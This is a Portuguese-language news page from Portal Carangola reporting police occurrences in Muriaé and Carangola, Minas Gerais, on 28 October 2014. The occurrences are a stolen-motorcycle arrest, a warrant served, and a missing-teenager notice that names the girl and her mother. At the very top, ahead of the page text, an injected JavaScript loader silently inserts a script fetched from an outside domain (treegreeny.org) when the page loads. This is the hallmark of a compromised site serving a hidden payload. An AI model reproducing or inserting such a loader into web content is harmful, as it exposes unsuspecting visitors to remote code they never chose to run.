;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 28/10/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 28/10/14.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 28/10/2014

                        76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO DE AUTOR E APREENSÃO DE VEÍCULO POR RECEPTAÇÃO EM MURIAÉ 

Em 27/10/2014, por volta das 08h35min, na Avenida Monteiro de Castro, no Bairro Barra, U.C.S., de 36 anos, foi abordado na condução da motocicleta YAMAHA XT 600, a qual é produto de furto/roubo. O cidadão quando abordado disse que é proprietário de um veículo FORD KA e que o emprestou a seu amigo, W.P.S., de 34 anos e ficou com a moto para circular até a devolução de seu carro. O homem citado foi localizado na condução do FORD KA, o qual estava circulando com a tarjeta da cidade de PETROPÓLIS-RJ e no documento registrado a cidade de MURIAÉ. Este admitiu ser o proprietário da motocicleta e teria adquirido de um terceiro e não tinha conhecimento que o veículo se tratava de produto de furto. Foi dada voz de prisão a este e conduzido à DPJ. Os veículos foram apreendidos.

PM CUMPRE MANDADO DE PRISÃO EM MIRADOURO

Em 27/10/2014, por volta das 14h50min, na Rua Coronel João Freitas, no Centro, A.J.S., de 30 anos, compareceu ao posto policial para resolver problemas relacionados ao seu veículo motocicleta e, após consulta no sistema, foi constatado um mandado de prisão por condenação em desfavor do mesmo.

75ª CIA PM – CARANGOLA-MG

PM REGISTRA COMUNICADO DE PESSOA DESAPARECIDA EM DIVINO 

Em 27/10/2014, por volta das 08h, na Praça Doutor Genserico Nunes de Oliveira, no Centro, ANA CLÁUDIA DE OLIVEIRA BRAGA, 33 anos, acompanhada de uma conselheira tutelar, relatou que sua filha EULA CÁLITA DE OLIVEIRA BRAGA, 15 anos, desapareceu de sua residência por volta das 08:00h, a solicitante não soube informar as roupas que ela estava usando e informou ainda que sua filha tem um relacionamento amoroso com o cidadão conhecido por WILDSON RIBEIRO, que reside na cidade de RIO DAS OSTRAS/RJ, a adolescente tem a cútis parda, mede aproximadamente 1.50 altura, pesa 40 kilos, tem cabelos encaracolados de cor castanho. 

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.